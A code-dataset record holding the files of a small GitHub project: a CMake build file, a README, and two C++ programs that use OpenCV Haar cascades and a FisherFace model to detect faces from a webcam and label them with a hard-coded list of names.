"alphanum_fraction": 0.7621145248413086,
"avg_line_length": 36.83333206176758,
"blob_id": "bcc786c6795f53ac6003de78e7a97e28b2c8d958",
"content_id": "da66e3fabae1827913cc2a0f7ed49cf42326e233",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 6,
"path": "/CMakeLists.txt",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8)\nproject( face_recg )\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} )\nadd_executable( face_recg face_recg.cpp )\ntarget_link_libraries( face_recg ${OpenCV_LIBS} )\n"
},
{
"alpha_fraction": 0.7572815418243408,
"alphanum_fraction": 0.7572815418243408,
"avg_line_length": 33.33333206176758,
"blob_id": "06c28fb591ead6e827b74cbfac1a5c2f2e0bff65",
"content_id": "9905a6b9e81677833b37645ee3634d978420d713",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/README.md",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "# face_recognize\nUse opencv lib realize face recognize. Write in c++.\n\nface_recg.cpp : the raw code of recognize;\ntrain_data.txt : the csv file of the data for training;\nCMakeLists.txt : the CMake makefile\n"
},
{
"alpha_fraction": 0.603520393371582,
"alphanum_fraction": 0.6348901987075806,
"avg_line_length": 29.047121047973633,
"blob_id": "aa1d2bd1fd9615f895ac02d3e854186bcbeb5e5f",
"content_id": "b76695ee290c754d521a973b1df24d3288381d67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5738,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 191,
"path": "/face_recg_all.cpp",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "#define _CRT_SECURE_NO_DEPRECATE\n#include <iostream>\n#include <sstream>\n#include <fstream>\n//#include <stdio.h>\n#include <opencv2/core.hpp>\n#include <opencv2/core/utility.hpp>\n#include <opencv2/core/ocl.hpp>\n#include <opencv2/imgcodecs.hpp>\n#include <opencv2/highgui.hpp>\n#include <opencv2/features2d.hpp>\n#include <opencv2/calib3d.hpp>\n#include <opencv2/imgproc.hpp>\n#include <opencv2/flann.hpp>\n#include <opencv2/xfeatures2d.hpp>\n#include <opencv2/ml.hpp>\n#include <opencv2/face.hpp>\n#include <opencv2/face/facerec.hpp>\n#include <opencv2/objdetect.hpp>\n\nusing namespace cv;\nusing namespace std;\nusing namespace cv::xfeatures2d;\nusing namespace cv::ml;\nusing namespace face;\n\n//#define READ_CSV\n\n#ifdef READ_CSV\nvoid read_csv(string& fileName,vector<Mat>& images,vector<int>& labels,char separator = ';')\n{\n\tifstream file(fileName.c_str(), ifstream::in);\n\tif (!file) {\n\t\tcout << \"No valid input file was given, please check the given filename.\" << endl;\n\t\treturn;\n\t}\n\n\tstring line, path, label;\n\n\twhile (getline(file, line)) {\n\t\tstringstream lines(line);\n\t\tgetline(lines, path, separator);\n\t\tgetline(lines, label);\n\n\t\tif (!path.empty() && !label.empty()) {\n\t\t\timages.push_back(imread(path, CV_LOAD_IMAGE_GRAYSCALE));\n\t\t\tlabels.push_back(atoi(label.c_str()));\n\t\t}\n\t}\n}\n#endif\n\nstatic CascadeClassifier face_cascade(\"./haarcascade_frontalface_default.xml\");\t\t//load Cascade\nstatic CascadeClassifier eyes_cascade(\"./haarcascade_eye_tree_eyeglasses.xml\");\nstatic CascadeClassifier nose_cascade(\"./haarcascade_mcs_nose.xml\");\nstatic CascadeClassifier mouth_cascade(\"./haarcascade_mcs_mouth.xml\");\n\nstatic string names[] = {\"Hobo\", \"Liss\", \"Liu Tao\", \"Luo Chuanyou\", \"Ma Wen\",\n\t\t\t\t \"Ren Junze\", \"Tian Heming\", \"Tian Minjie\", \"Zhao Cancan\", \n\t\t\t\t \"Zhao Cong\", \"Zheng Fanglei\"};\n\nstatic void detect_features(Mat& img, Rect& face);\nint main()\n{\n\tPtr<FaceRecognizer> fc = createFisherFaceRecognizer();\n\n#ifdef READ_CSV\n\tstring csvPath = \"./train_data.txt\";\n\n\tvector<Mat> images; \n\tvector<int> labels;\n\tread_csv(csvPath, images, labels);\n\n\tfc->train(images, labels); //train\n\tfc->save(\"./Face_Model.xml\"); //save data after trained.\n#else\n\tfc->load(\"Face_Model.xml\");\n#endif\n\n\tVideoCapture cap(0);\n\tcap.set(CAP_PROP_FRAME_WIDTH, 1280);\n\tcap.set(CAP_PROP_FRAME_HEIGHT, 720);\n\n\tMat image;\n\tvector<Rect> recs;\n\tMat test(200, 200, CV_8UC1);\n\tMat gray;\n\tint x = 0, y = 0;\n\tint predict_label = 0;\n\tdouble predict_confidence = 0.0;\n\n\twhile(1) {\n\t\t//image = imread(\"0_02.jpg\", CV_LOAD_IMAGE_COLOR);\n\t\tbool ret = cap.read(image);\n\t\tif (ret == false) {\n\t\t\tcout << \"Can't get data from cap\" << endl;\n\t\t\tbreak;\n\t\t}\n\n\t\tface_cascade.detectMultiScale(image, recs,1.2,6,0,Size(50,50)); //detect the face\n\t\tfor (int i = 0; i < recs.size();i++) {\n\t\t\trectangle(image, recs[i], Scalar(0, 0, 255));\n\t\t\tx = recs[i].x + recs[i].width / 2;\n\t\t\ty = recs[i].y + recs[i].height / 2;\n\n\t\t\tMat roi = image(recs[i]);\n\t\t\tcvtColor(roi, gray, CV_BGR2GRAY);\n\t\t\tresize(gray, test, Size(200, 200)); //the training sample is 200x200, resize the pic here.\n\n\t\t\tfc->predict(test, predict_label, predict_confidence); \n\t\t\tif (predict_confidence < 800) { \n\t\t\t\tputText(image, names[predict_label], Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t} else {\n\t\t\t\tputText(image, \"Hi, New friends!\", 
Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2); \n\t\t\t}\n\t\t\tdetect_features(image, recs[i]);\n\t\t}\n\n\t\timshow(\"Detected\", image);\n\t\tif (waitKey(10) == 27)\n\t\t\tbreak;\n\t}\n\n\treturn 0;\n}\n\nstatic void detect_features(Mat& img, Rect& face)\n{\n\tbool is_full_detection = true;\n//\trectangle(img, Point(face.x, face.y), Point(face.x+face.width, face.y+face.height),\n//\t\t\tScalar(255, 0, 0), 1, 4);\n\n\t// Eyes, nose and mouth will be detected inside the face (region of interest)\n\tMat ROI = img(Rect(face.x, face.y, face.width, face.height));\n\n\tif (!eyes_cascade.empty())\n\t{\n\t\t//detect eyes\n\t\tvector<Rect_<int> > eyes;\n\t\teyes_cascade.detectMultiScale(ROI, eyes, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\t// Mark points corresponding to the centre of the eyes\n\t\tfor(unsigned int j = 0; j < eyes.size(); ++j)\n\t\t{\n\t\t\tRect e = eyes[j];\n\t\t\tcircle(ROI, Point(e.x+e.width/2, e.y+e.height/2), 3, Scalar(0, 255, 0), -1, 8);\n\t\t\t/* rectangle(ROI, Point(e.x, e.y), Point(e.x+e.width, e.y+e.height),\n\t\t\tScalar(0, 255, 0), 1, 4); */\n\t\t}\n\t}\n\n\t// Detect nose if classifier provided by the user\n\tdouble nose_center_height = 0.0;\n\tif(!nose_cascade.empty())\n\t{\n\t\tvector<Rect_<int> > nose;\n\t\tnose_cascade.detectMultiScale(ROI, nose, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\t// Mark points corresponding to the centre (tip) of the nose\n\t\tfor(unsigned int j = 0; j < nose.size(); ++j)\n\t\t{\n\t\t\tRect n = nose[j];\n\t\t\tcircle(ROI, Point(n.x+n.width/2, n.y+n.height/2), 3, Scalar(0, 255, 0), -1, 8);\n\t\t\tnose_center_height = (n.y + n.height/2);\n\t\t}\n\t}\n\n\t// Detect mouth if classifier provided by the user\n\tdouble mouth_center_height = 0.0;\n\tif(!mouth_cascade.empty())\n\t{\n\t\tvector<Rect_<int> > mouth;\n\t\tmouth_cascade.detectMultiScale(ROI, mouth, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\tfor(unsigned int j = 0; j < mouth.size(); ++j)\n\t\t{\n\t\t\tRect m = mouth[j];\n\t\t\tmouth_center_height = (m.y + m.height/2);\n\n\t\t\t// The mouth should lie below the nose\n\t\t\tif( (is_full_detection) && (mouth_center_height > nose_center_height) )\n\t\t\t{\n\t\t\t\trectangle(ROI, Point(m.x, m.y), Point(m.x+m.width, m.y+m.height), Scalar(0, 255, 0), 1, 4);\n\t\t\t}\n\t\t\telse if( (is_full_detection) && (mouth_center_height <= nose_center_height) )\n\t\t\t\tcontinue;\n\t\t\telse\n\t\t\trectangle(ROI, Point(m.x, m.y), Point(m.x+m.width, m.y+m.height), Scalar(0, 255, 0), 1, 4);\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.610027015209198,
"alphanum_fraction": 0.6454518437385559,
"avg_line_length": 24.821704864501953,
"blob_id": "a7b71fc65e9259fe6f3acd6a800503abf4e4a3fd",
"content_id": "a6995083e32f7679de59c79c1a31606be2d9cb4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3331,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 129,
"path": "/face_recg.cpp",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "#define _CRT_SECURE_NO_DEPRECATE\n#include <iostream>\n#include <sstream>\n#include <fstream>\n//#include <stdio.h>\n#include <opencv2/core.hpp>\n#include <opencv2/core/utility.hpp>\n#include <opencv2/core/ocl.hpp>\n#include <opencv2/imgcodecs.hpp>\n#include <opencv2/highgui.hpp>\n#include <opencv2/features2d.hpp>\n#include <opencv2/calib3d.hpp>\n#include <opencv2/imgproc.hpp>\n#include <opencv2/flann.hpp>\n#include <opencv2/xfeatures2d.hpp>\n#include <opencv2/ml.hpp>\n#include <opencv2/face.hpp>\n#include <opencv2/face/facerec.hpp>\n#include <opencv2/objdetect.hpp>\n\nusing namespace cv;\nusing namespace std;\nusing namespace cv::xfeatures2d;\nusing namespace cv::ml;\nusing namespace face;\n\n//#define READ_CSV\n\n#ifdef READ_CSV\nvoid read_csv(string& fileName,vector<Mat>& images,vector<int>& labels,char separator = ';')\n{\n\tifstream file(fileName.c_str(), ifstream::in);\n\tif (!file) {\n\t\tcout << \"No valid input file was given, please check the given filename.\" << endl;\n\t\treturn;\n\t}\n\n\tstring line, path, label;\n\n\twhile (getline(file, line)) {\n\t\tstringstream lines(line);\n\t\tgetline(lines, path, separator);\n\t\tgetline(lines, label);\n\n\t\tif (!path.empty() && !label.empty()) {\n\t\t\timages.push_back(imread(path, CV_LOAD_IMAGE_GRAYSCALE));\n\t\t\tlabels.push_back(atoi(label.c_str()));\n\t\t}\n\t}\n}\n#endif\n\nint main()\n{\n\tCascadeClassifier cas(\"./haarcascade_frontalface_default.xml\");\t\t//load Cascade\n\tPtr<FaceRecognizer> fc = createFisherFaceRecognizer();\n\n#ifdef READ_CSV\n\tstring csvPath = \"./train_data.txt\";\n\n\tvector<Mat> images; \n\tvector<int> labels;\n\tread_csv(csvPath, images, labels);\n\n\tfc->train(images, labels); //train\n\tfc->save(\"./Face_Model.xml\"); //save data after trained.\n#else\n\tfc->load(\"Face_Model.xml\");\n#endif\n\n\tVideoCapture cap(0);\n\tcap.set(CAP_PROP_FRAME_WIDTH, 1280);\n\tcap.set(CAP_PROP_FRAME_HEIGHT, 720);\n\n\tMat image;\n\tvector<Rect> recs;\n\tMat test(200, 200, CV_8UC1);\n\tMat gray;\n\tint x = 0, y = 0;\n\n\twhile(1) {\n\t\t//image = imread(\"0_02.jpg\", CV_LOAD_IMAGE_COLOR);\n\t\tbool ret = cap.read(image);\n\t\tif (ret == false) {\n\t\t\tcout << \"Can't get data from cap\" << endl;\n\t\t\tbreak;\n\t\t}\n\n\t\tcas.detectMultiScale(image, recs,1.2,6,0,Size(50,50)); //detect the face\n\t\tfor (int i = 0; i < recs.size();i++) {\n\t\t\trectangle(image, recs[i], Scalar(0, 0, 255));\n\t\t\tx = recs[i].x + recs[i].width / 2;\n\t\t\ty = recs[i].y + recs[i].height / 2;\n\n\t\t\tMat roi = image(recs[i]);\n\t\t\tcvtColor(roi, gray, CV_BGR2GRAY);\n\t\t\tresize(gray, test, Size(200, 200)); //since the training sample is 200x200, so need resize here.\n\n\t\t\tint result = fc->predict(test);\n\t\t\tswitch (result) {\n\t\t\t\tcase 0:\n\t\t\t\t\tputText(image, \"Liu Tao\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 1:\n\t\t\t\t\tputText(image, \"Ren Junze\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 2:\n\t\t\t\t\tputText(image, \"Tian Heming\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 3:\n\t\t\t\t\tputText(image, \"Tian Minjie\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tdefault:\n\t\t\t\t\tputText(image, \"Hi, New Friend\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 
2);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\timshow(\"Detected\", image);\n\t\tif (waitKey(10) == 27)\n\t\t\tbreak;\n\t}\n\n\treturn 0;\n}\n"
}
] | 5 |
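generate_csv_file() in Add_Tag_IN_CSV_FILE.py is left as a stub, with hints in its comments. A sketch of one way it could be implemented so the output matches the path;label lines the C++ read_csv expects (root and output paths are parameters here rather than the script's hard-coded F: paths):

import glob
import os

def generate_csv_file(root, out_path, separator=';'):
    # One sub-folder per person under root; folders are labeled 0, 1, 2, ... in sorted order.
    with open(out_path, 'w') as out:
        label = 0
        for person in sorted(os.listdir(root)):
            person_dir = os.path.join(root, person)
            if not os.path.isdir(person_dir):
                continue
            for image in sorted(glob.glob(os.path.join(person_dir, '*.jpg'))):
                out.write('%s%s%d\n' % (image, separator, label))
            label += 1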
andriy-kulish/flask-book-library | https://github.com/andriy-kulish/flask-book-library | 0c5752081c1afe2f046767464cfabc311de253c6 | 8f8a822931a2e40053698073782fa70c95e65f15 | 833a518f360bc576afda5eade8acf59bfb92520c | refs/heads/master | 2021-01-01T18:06:47.855078 | 2014-03-25T07:46:35 | 2014-03-25T07:46:35 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6856403350830078,
"alphanum_fraction": 0.6856403350830078,
"avg_line_length": 32.60869598388672,
"blob_id": "55f3a8f9454d67c72e37c88942c4fdeac99753c6",
"content_id": "d9749b35129a90b84370741de9e204a0b39eab2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/app/database.py",
"repo_name": "andriy-kulish/flask-book-library",
"src_encoding": "UTF-8",
"text": "import os\nfrom app import app\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nexists = os.path.isfile(app.config['DATABASE'])\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + app.config['DATABASE']\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI, convert_unicode=True)\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\n\ndef init_db():\n import models\n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine)\n"
}
] | 1 |
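A minimal usage sketch for the scoped session and declarative Base wired up in app/database.py (the Book model and its fields are illustrative, not taken from the repository; init_db() also imports the package's models module, which is assumed to be importable):

from sqlalchemy import Column, Integer, String
from app.database import Base, db_session, init_db

class Book(Base):
    __tablename__ = 'books'
    id = Column(Integer, primary_key=True)
    title = Column(String(120))

init_db()                               # drops and recreates all tables known to Base
db_session.add(Book(title='Example'))
db_session.commit()
print(Book.query.count())               # Base.query is bound to db_session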
oooolga/IFT6135-A2 | https://github.com/oooolga/IFT6135-A2 | f53199e73bbc16c7288c043a8bb5dd7bf438351e | 0e7f6e6f8821b39750bd7fc903521e4b661826db | e4185d5264dab847798bdf35702f1cd64fe79486 | refs/heads/master | 2021-03-30T18:21:21.013697 | 2017-12-05T02:56:13 | 2017-12-05T02:56:13 | 123,229,629 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6681034564971924,
"alphanum_fraction": 0.6808620691299438,
"avg_line_length": 31.396648406982422,
"blob_id": "927199cb378ca398f7c3338b39aac0c21f9fa117",
"content_id": "67b90d3540bf913379484639b605fa74a832413f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5800,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 179,
"path": "/part2/util.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nimport pdb\nimport numpy as np\nimport argparse, os\nimport copy, glob, math, random\nimport scipy.misc\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nuse_cuda = torch.cuda.is_available()\n\ntorch.manual_seed(123)\n\nif use_cuda:\n\ttorch.cuda.manual_seed_all(123)\n\nnp.random.seed(123)\nrandom.seed(123)\n\nDATA_PATH = './datasets'\nTRAIN_PATH_OLD = './datasets/train_64x64'\nTEST_PATH_OLD = './datasets/valid_64x64'\nTRAIN_PATH = './datasets/train'\nTEST_PATH = './datasets/test'\nRESULT_PATH = './result'\n\nIMG_PATH = './datasets/PetImages'\n\nGLOBAL_TEMP = None\n\ndef factorization(n):\n\tfrom math import sqrt\n\tfor i in range(int(sqrt(float(n))), 0, -1):\n\t\tif n % i == 0:\n\t\t\tif i == 1: print('Who would enter a prime number of filters')\n\t\t\treturn int(n / i), i\n\ndef visualize_kernel(kernel_tensor, im_name='conv1_kernel.jpg', pad=1, im_scale=100.0,\n\t\t\t\t\t model_name='', rescale=True):\n\n\t# map tensor wight in [0,255]\n\tif rescale:\n\t\tmax_w = torch.max(kernel_tensor)\n\t\tmin_w = torch.min(kernel_tensor)\n\t\tscale = torch.abs(max_w-min_w)\n\t\tkernel_tensor = (kernel_tensor - min_w) / scale * 255.0\n\t\tkernel_tensor = torch.ceil(kernel_tensor)\n\n\t# pad kernel\n\tp2d = (pad, pad, pad, pad)\n\tpadded_kernel_tensor = F.pad(kernel_tensor, p2d, 'constant', 0)\n\n\t# get the shape of output\n\tgrid_Y, grid_X = factorization(kernel_tensor.size()[0])\n\tY, X = padded_kernel_tensor.size()[2], padded_kernel_tensor.size()[3]\n\n\t# reshape\n\t# (grid_Y*grid_X) x y_dim x x_dim x num_chann\n\tpadded_kernel_tensor = padded_kernel_tensor.permute(0, 2, 3, 1)\n\tpadded_kernel_tensor = padded_kernel_tensor.cpu().view(grid_X, grid_Y*Y, X, -1)\n\tpadded_kernel_tensor = padded_kernel_tensor.permute(0, 2, 1, 3)\n\t#padded_kernel_tensor = padded_kernel_tensor.view(1, grid_X*X, grid_Y*Y, -1)\n\n\t# kernel in numpy\n\tkernel_im = np.uint8((padded_kernel_tensor.data).numpy()).reshape(grid_X*X,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t grid_Y*Y, -1)\n\tkernel_im = scipy.misc.imresize(kernel_im, im_scale, 'nearest')\n\tprint '| Saving {}...'.format(os.path.join(RESULT_PATH, model_name+'_'+im_name))\n\tscipy.misc.imsave(os.path.join(RESULT_PATH, model_name+'_'+im_name), kernel_im)\n\n\ndef plot_acc_loss(train_loss, train_acc, val_loss, val_acc, test_loss, test_acc,\n\t\t\t\t model_name=''):\n\n\tplt.clf()\n\tplt.plot(range(len(train_loss)), train_loss, 'ro-', label='train')\n\tplt.plot(range(len(train_loss)), val_loss, 'bs-', label='valid')\n\tplt.plot(range(len(train_loss)), test_loss, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Loss')\n\n\tplt.title('Epoch vs Loss')\n\tplt.legend(loc=1)\n\tprint '| saving {}...'.format('{}/{}_loss_curve.png'.format(RESULT_PATH, model_name))\n\tplt.savefig('{}/{}_loss_curve.png'.format(RESULT_PATH, model_name))\n\n\tplt.clf()\n\tplt.plot(range(len(train_loss)), train_acc, 'ro-', label='train')\n\tplt.plot(range(len(train_loss)), val_acc, 'bs-', label='valid')\n\tplt.plot(range(len(train_loss)), test_acc, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Accuracy')\n\n\tplt.title('Epoch vs Accuracy')\n\tplt.legend(loc=4)\n\tprint '| saving {}...'.format('{}/{}_acc_curve.png'.format(RESULT_PATH, 
model_name))\n\tplt.savefig('{}/{}_acc_curve.png'.format(RESULT_PATH, model_name))\n\ndef plot_error(train_err, val_err, test_err, model_name=''):\n\n\tplt.clf()\n\tplt.plot(range(len(train_err)), train_err, 'ro-', label='train')\n\tplt.plot(range(len(train_err)), val_err, 'bs-', label='valid')\n\t#plt.plot(range(len(train_err)), test_err, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Loss')\n\n\tplt.title('Epoch vs Error')\n\tplt.legend(loc=1)\n\tprint '| saving {}...'.format('{}/{}_error_curve.png'.format(RESULT_PATH, model_name))\n\tplt.savefig('{}/{}_error_curve.png'.format(RESULT_PATH, model_name))\n\n\ndef seperate_data():\n\n\tif not os.path.exists(TRAIN_PATH):\n\t\tos.makedirs(TRAIN_PATH)\n\t\tos.makedirs(os.path.join(TRAIN_PATH, 'cat'))\n\t\tos.makedirs(os.path.join(TRAIN_PATH, 'dog'))\n\n\t\tfor file in glob.glob(os.path.join(TRAIN_PATH_OLD, 'Cat*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TRAIN_PATH, 'cat', file_name))\n\n\t\tfor file in glob.glob(os.path.join(TRAIN_PATH_OLD, 'Dog*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TRAIN_PATH, 'dog', file_name))\n\n\tif not os.path.exists(TEST_PATH):\n\t\tos.makedirs(TEST_PATH)\n\t\tos.makedirs(os.path.join(TEST_PATH, 'cat'))\n\t\tos.makedirs(os.path.join(TEST_PATH, 'dog'))\n\n\t\tfor file in glob.glob(os.path.join(TEST_PATH_OLD, 'Cat*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TEST_PATH, 'cat', file_name))\n\n\t\tfor file in glob.glob(os.path.join(TEST_PATH_OLD, 'Dog*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TEST_PATH, 'dog', file_name))\n\n\ndef load_data(batch_size=64, test_batch_size=1000):\n\n\ttrain_data = dset.ImageFolder(root=TRAIN_PATH, transform=transforms.ToTensor())\n\ttrain_imgs = random.sample(train_data.imgs, len(train_data))\n\ttrain_data.imgs = train_imgs[:-2499]\n\ttrain_loader = torch.utils.data.DataLoader(train_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\n\tvalid_data = dset.ImageFolder(root=TRAIN_PATH, transform=transforms.ToTensor())\n\tvalid_data.imgs = train_imgs[-2499:]\n\tvalid_loader = torch.utils.data.DataLoader(valid_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\n\ttest_data = dset.ImageFolder(root=TEST_PATH, transform=transforms.ToTensor())\n\ttest_loader = torch.utils.data.DataLoader(test_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=test_batch_size, shuffle=True)\n\n\treturn train_loader, valid_loader, test_loader\n\nfrom model import *\nfrom train_valid import *\nfrom main import *\n\t"
},
{
"alpha_fraction": 0.6491560339927673,
"alphanum_fraction": 0.6668963432312012,
"avg_line_length": 32.36206817626953,
"blob_id": "5357f4b27f2ccdaad4e4c88bed13815052a12a97",
"content_id": "4d22e07e6ec83513bf381798a48fb1ce4ab4b7ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5806,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 174,
"path": "/part2/train_valid.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\ndef _train(model, train_loader, optimizer, verbose):\n\n\tmodel.train()\n\n\tfor batch_idx, (data, target) in enumerate(train_loader):\n\n\t\tif use_cuda:\n\t\t\tdata, target = data.cuda(), target.cuda()\n\n\t\tdata, target = Variable(data, requires_grad=False), Variable(target, requires_grad=False)\n\n\t\toptimizer.zero_grad()\n\t\toutput = model(data)\n\n\t\ttarget = target.view(-1, 1)\n\t\tloss = F.binary_cross_entropy(F.sigmoid(output), target.float())\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tif verbose and batch_idx % 50 == 0:\n\t\t\tprint '| | iter: {}\\tloss: {:.4f}'.format(batch_idx, loss.data[0])\n\n\treturn loss\n\ndef _evaluate_data_set(model, data_loader, get_top_misclassified=None,\n\t\t\t\t\t get_ambiguous=None):\n\n\tmodel.eval()\n\ttotal_loss, correct = 0, 0\n\ttotal_data, total_batch = 0, 0\n\ttop_ims = None\n\tamb_ims = None\n\n\tif get_top_misclassified:\n\t\ttop_ims = np.empty([0,3,64,64])\n\t\ttop_count = 0\n\n\tif get_ambiguous:\n\t\tamb_ims = np.empty([0,3,64,64])\n\t\tamb_count = 0\n\n\tfor batch_idx, (data, target) in enumerate(data_loader):\n\n\t\tif use_cuda:\n\t\t\tdata, target = data.cuda(), target.cuda()\n\n\t\tdata, target = Variable(data, volatile=True, requires_grad=False), \\\n\t\t\t\t\tVariable(target, requires_grad=False)\n\n\t\toutput = model(data)\n\t\t\n\n\t\tout_eval = F.sigmoid(output)\n\n\t\ttarget = target.view(-1, 1)\n\t\ttotal_loss += F.binary_cross_entropy(out_eval, target.float()).data[0]\n\n\t\tif get_top_misclassified and top_count < get_top_misclassified:\n\t\t\t_, top_index = torch.max(torch.abs(target.float()-out_eval),0)\n\t\t\ttop_index = top_index.data[0]\n\t\t\ttop_count += 1\n\t\t\ttop_data = data[top_index].view(1,3,64,64).cpu()\n\t\t\ttop_data = top_data.data.numpy()\n\t\t\ttop_ims = np.concatenate((top_ims, top_data), 0)\n\n\t\tif get_ambiguous and amb_count < get_ambiguous:\n\t\t\t_, amb_index = torch.min(torch.abs(out_eval-0.5),0)\n\t\t\tamb_index = amb_index.data[0]\n\t\t\tamb_count += 1\n\t\t\tamb_data = data[amb_index].view(1,3,64,64).cpu()\n\t\t\tamb_data = amb_data.data.numpy()\n\t\t\tamb_ims = np.concatenate((amb_ims, amb_data), 0)\n\n\t\tout_eval = out_eval.data-0.5\n\n\t\tpredicted = torch.ceil(out_eval).int()\n\t\ttarget = target.int()\n\n\t\tcorrect += (predicted == target.data).sum()\n\n\t\ttotal_data += len(data)\n\t\ttotal_batch += 1\n\n\tavg_loss = total_loss / float(total_batch)\n\taccuracy = correct / float(total_data)\n\n\treturn avg_loss, accuracy, top_ims, amb_ims\n\n\ndef run(model, train_loader, valid_loader, test_loader, model_name, \n\t\ttotal_epoch, lr, opt, momentum, lr_decay=1e-5, weight_decay=5e-5):\n\n\tif opt == 'Adagrad':\n\t\tprint 'Learning rate decay:\\t{}'.format(lr_decay)\n\t\tprint 'Weight decay:\\t\\t{}\\n'.format(weight_decay)\n\t\toptimizer = optim.Adagrad(model.parameters(), lr=lr, lr_decay=lr_decay,\n\t\t\t\t\t\t\t\t weight_decay=weight_decay)\n\tif opt == 'Adam':\n\t\tprint 'Weight decay:\\t\\t{}\\n'.format(weight_decay)\n\t\toptimizer = optim.Adam(model.parameters(), lr=lr,\n\t\t\t\t\t\t\t weight_decay=weight_decay)\n\telse:\n\t\tprint 'Momentum:\\t\\t{}\\n'.format(momentum)\n\t\toptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)\n\n\ttrain_acc, valid_acc, test_acc = [], [], []\n\ttrain_loss, valid_loss, test_loss = [], [], []\n\n\tprint('| epoch: {}'.format(0))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, 
